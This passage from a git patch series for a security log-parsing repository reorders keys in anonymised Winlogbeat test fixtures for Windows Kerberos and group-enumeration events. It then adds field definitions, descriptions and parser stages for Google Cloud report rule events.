l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4769\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:05.023Z\",\"action\":\"Op\u00e9rations de ticket du service Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:02.856Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOST01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Op\u00e9rations de ticket du service Kerberos\",\"computer_name\":\"HOST01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810000\",\"LogonGuid\":\"{12345678-ABCD-EF90-1234-123456ABCDEF}\",\"IpPort\":\"50754\",\"TargetDomainName\":\"DOMAIN.PRIV\",\"TargetUserName\":\"account@DOMAIN.PRIV\",\"ServiceSid\":\"S-1-2-3\",\"Status\":\"0x0\",\"TransmittedServices\":\"-\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"SERVICE$\"},\"process\":{\"thread\":{\"id\":7992},\"pid\":560},\"event_id\":\"4769\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587153},\"@version\":\"1\"}",
     "sekoiaio": {
       "intake": {
         "dialect": "Elastic Winlogbeat",
         "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b"
       }
-    },
-    "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4769\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:05.023Z\",\"action\":\"Op\u00e9rations de ticket du service Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:02.856Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOST01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Op\u00e9rations de ticket du service Kerberos\",\"computer_name\":\"HOST01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810000\",\"LogonGuid\":\"{12345678-ABCD-EF90-1234-123456ABCDEF}\",\"IpPort\":\"50754\",\"TargetDomainName\":\"DOMAIN.PRIV\",\"TargetUserName\":\"account@DOMAIN.PRIV\",\"ServiceSid\":\"S-1-2-3\",\"Status\":\"0x0\",\"TransmittedServices\":\"-\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"SERVICE$\"},\"process\":{\"thread\":{\"id\":7992},\"pid\":560},\"event_id\":\"4769\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587153},\"@version\":\"1\"}"
+    }
   },
   "expected": {
     "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4769\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:05.023Z\",\"action\":\"Op\u00e9rations de ticket du service Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:02.856Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOST01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Op\u00e9rations de ticket du service Kerberos\",\"computer_name\":\"HOST01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810000\",\"LogonGuid\":\"{12345678-ABCD-EF90-1234-123456ABCDEF}\",\"IpPort\":\"50754\",\"TargetDomainName\":\"DOMAIN.PRIV\",\"TargetUserName\":\"account@DOMAIN.PRIV\",\"ServiceSid\":\"S-1-2-3\",\"Status\":\"0x0\",\"TransmittedServices\":\"-\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"SERVICE$\"},\"process\":{\"thread\":{\"id\":7992},\"pid\":560},\"event_id\":\"4769\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587153},\"@version\":\"1\"}",
diff --git a/Beats/winlogbeat/tests/security_event_4798.json b/Beats/winlogbeat/tests/security_event_4798.json
index b69049f3d..3e7783fbd 100644
--- a/Beats/winlogbeat/tests/security_event_4798.json
+++ b/Beats/winlogbeat/tests/security_event_4798.json
@@ -1,12 +1,12 @@
 {
   "input": {
+    "message": "{\"@timestamp\":\"2024-11-12T08:25:34.741Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4798\",\"created\":\"2024-11-12T08:25:35.614Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\"},\"message\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{11111111-2222-3333-4444-555555555555}\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"User Account Management\",\"process\":{\"pid\":668,\"thread\":{\"id\":8860}},\"event_data\":{\"TargetSid\":\"S-3-4-5\",\"TargetUserName\":\"Guest\",\"SubjectDomainName\":\"DOMAIN\",\"CallerProcessName\":\"C:\\\\Program Files\\\\program.exe\",\"SubjectUserName\":\"ACC0123$\",\"TargetDomainName\":\"ACC0123\",\"SubjectLogonId\":\"0x3e7\",\"SubjectUserSid\":\"S-1-2-3\",\"CallerProcessId\":\"0x123\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"ACC0123.johndoe.com\",\"record_id\":1524672,\"event_id\":\"4798\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"ACC0123\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"ephemeral_id\":\"12345678-90ab-cdef-1234-123456abcdef\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"12345678-90ef-abcd-1234-abcdef123456\",\"name\":\"hostname\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.20348.169 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2022 Standard\",\"build\":\"20348.169\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}",
     "sekoiaio": {
       "intake": {
         "dialect": "Elastic Winlogbeat",
         "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b"
       }
-    },
-    "message": "{\"@timestamp\":\"2024-11-12T08:25:34.741Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4798\",\"created\":\"2024-11-12T08:25:35.614Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\"},\"message\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{11111111-2222-3333-4444-555555555555}\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"User Account Management\",\"process\":{\"pid\":668,\"thread\":{\"id\":8860}},\"event_data\":{\"TargetSid\":\"S-3-4-5\",\"TargetUserName\":\"Guest\",\"SubjectDomainName\":\"DOMAIN\",\"CallerProcessName\":\"C:\\\\Program Files\\\\program.exe\",\"SubjectUserName\":\"ACC0123$\",\"TargetDomainName\":\"ACC0123\",\"SubjectLogonId\":\"0x3e7\",\"SubjectUserSid\":\"S-1-2-3\",\"CallerProcessId\":\"0x123\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"ACC0123.johndoe.com\",\"record_id\":1524672,\"event_id\":\"4798\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"ACC0123\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"ephemeral_id\":\"12345678-90ab-cdef-1234-123456abcdef\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"12345678-90ef-abcd-1234-abcdef123456\",\"name\":\"hostname\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.20348.169 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2022 Standard\",\"build\":\"20348.169\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}"
+    }
   },
   "expected": {
     "message": "{\"@timestamp\":\"2024-11-12T08:25:34.741Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4798\",\"created\":\"2024-11-12T08:25:35.614Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\"},\"message\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{11111111-2222-3333-4444-555555555555}\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"User Account Management\",\"process\":{\"pid\":668,\"thread\":{\"id\":8860}},\"event_data\":{\"TargetSid\":\"S-3-4-5\",\"TargetUserName\":\"Guest\",\"SubjectDomainName\":\"DOMAIN\",\"CallerProcessName\":\"C:\\\\Program Files\\\\program.exe\",\"SubjectUserName\":\"ACC0123$\",\"TargetDomainName\":\"ACC0123\",\"SubjectLogonId\":\"0x3e7\",\"SubjectUserSid\":\"S-1-2-3\",\"CallerProcessId\":\"0x123\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"ACC0123.johndoe.com\",\"record_id\":1524672,\"event_id\":\"4798\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"ACC0123\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"ephemeral_id\":\"12345678-90ab-cdef-1234-123456abcdef\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"12345678-90ef-abcd-1234-abcdef123456\",\"name\":\"hostname\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.20348.169 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2022 Standard\",\"build\":\"20348.169\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}",

From 97df98680856146f65f7555985ef2764e75c5312 Mon Sep 17 00:00:00 2001
From: TOUFIKI Zakarya <zakarya.toufiki@sekoia.io>
Date: Thu, 14 Nov 2024 14:24:35 +0100
Subject: [PATCH 229/317] Add rules service

---
 Google Cloud/google-report/_meta/fields.yml   | 25 +++++++++
 .../_meta/smart-descriptions.json             | 50 +++++++++++++++++
 Google Cloud/google-report/ingest/parser.yml  | 23 ++++++++
 .../tests/test_rules_sample_1.json            | 55 +++++++++++++++++++
 .../tests/test_rules_sample_2.json            | 55 +++++++++++++++++++
 5 files changed, 208 insertions(+)
 create mode 100644 Google Cloud/google-report/tests/test_rules_sample_1.json
 create mode 100644 Google Cloud/google-report/tests/test_rules_sample_2.json

diff --git a/Google Cloud/google-report/_meta/fields.yml b/Google Cloud/google-report/_meta/fields.yml
index 84b0db0f6..fd683eea8 100644
--- a/Google Cloud/google-report/_meta/fields.yml	
+++ b/Google Cloud/google-report/_meta/fields.yml	
@@ -33,6 +33,31 @@ google.report.parameters.visibility:
   name: google.report.parameters.visibility
   type: keyword
 
+google.report.rule.data_source:
+  description: Data source
+  name: google.report.rule.data_source
+  type: keyword
+
+google.report.rule.name:
+  description: Name of the rule
+  name: google.report.rule.name
+  type: keyword
+
+google.report.rule.scan_type:
+  description: Scan type
+  name: google.report.rule.scan_type
+  type: keyword
+
+google.report.rule.severity:
+  description: Severity of the rule
+  name: google.report.rule.severity
+  type: keyword
+
+google.report.rule.type:
+  description: Rule type
+  name: google.report.rule.type
+  type: keyword
+
 google.report.token.app_name:
   description: Token authorization application name
   name: google.report.token.app_name
diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json
index 6a934ee3d..9b88f06de 100644
--- a/Google Cloud/google-report/_meta/smart-descriptions.json	
+++ b/Google Cloud/google-report/_meta/smart-descriptions.json	
@@ -168,6 +168,56 @@
       }
     ]
   },
+  {
+    "value": "The {google.report.rule.type} action was completed with a severity of {google.report.rule.severity}, using the {google.report.rule.name} rule applied to the {google.report.rule.data_source}",
+    "conditions": [
+      {
+        "field": "network.application",
+        "value": "rules"
+      },
+      {
+        "field": "event.action",
+        "value": "action_complete"
+      },
+      {
+        "field": "google.report.rule.severity"
+      },
+      {
+        "field": "google.report.rule.name"
+      },
+      {
+        "field": "google.report.rule.data_source"
+      },
+      {
+        "field": "google.report.rule.type"
+      }
+    ]
+  },
+  {
+    "value": "The {google.report.rule.type} content was matched with a severity of {google.report.rule.severity}, using the {google.report.rule.name} rule applied to the {google.report.rule.data_source}",
+    "conditions": [
+      {
+        "field": "network.application",
+        "value": "rules"
+      },
+      {
+        "field": "event.action",
+        "value": "content_matched"
+      },
+      {
+        "field": "google.report.rule.severity"
+      },
+      {
+        "field": "google.report.rule.name"
+      },
+      {
+        "field": "google.report.rule.data_source"
+      },
+      {
+        "field": "google.report.rule.type"
+      }
+    ]
+  },
   {
     "value": "{source.ip} with ID {user.id} changing in the {network.application} application",
     "conditions": [
diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml
index bd5fd0d4e..e9640ba28 100644
--- a/Google Cloud/google-report/ingest/parser.yml	
+++ b/Google Cloud/google-report/ingest/parser.yml	
@@ -28,6 +28,8 @@ pipeline:
     filter: '{{ json_event.message.id.applicationName == "admin"}}'
   - name: set_vault_fields
     filter: '{{ json_event.message.id.applicationName == "vault"}}'
+  - name: set_rules_fields
+    filter: '{{ json_event.message.id.applicationName == "rules"}}'
   - name: set_parameters_fields
     filter: '{{ json_event.message.events[0].name == "SUSPEND_USER"}}'
 
@@ -258,3 +260,24 @@ stages:
                 {%- endif -%}
             {% endfor %}
             {{ types|unique|list }}
+
+  set_rules_fields:
+    actions:
+      - set:
+          google.report.rule.name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "rule_name" %}{{param.value}}{% endif %}{% endfor %}'
